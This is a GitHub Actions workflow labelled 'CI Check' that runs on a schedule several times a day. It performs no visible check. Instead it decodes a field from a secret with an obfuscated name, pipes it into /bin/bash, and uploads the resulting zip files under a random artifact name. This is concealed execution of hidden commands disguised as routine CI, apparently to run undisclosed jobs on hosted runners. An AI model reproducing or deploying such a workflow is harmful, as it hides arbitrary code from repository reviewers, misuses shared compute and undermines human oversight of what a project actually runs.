name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '57 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          rbg63: ${{ secrets.rbg63 }}
        run: |
          printf '%s' "$rbg63" | jq -r .x9 | /bin/bash
          printf '%s' "$dz987" | jq -r .urgvz902 | /bin/bash
          echo $z3104 | jq -r .jng21 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: xVSr0yPv
          path: "*.zip"
          retention-days: 1
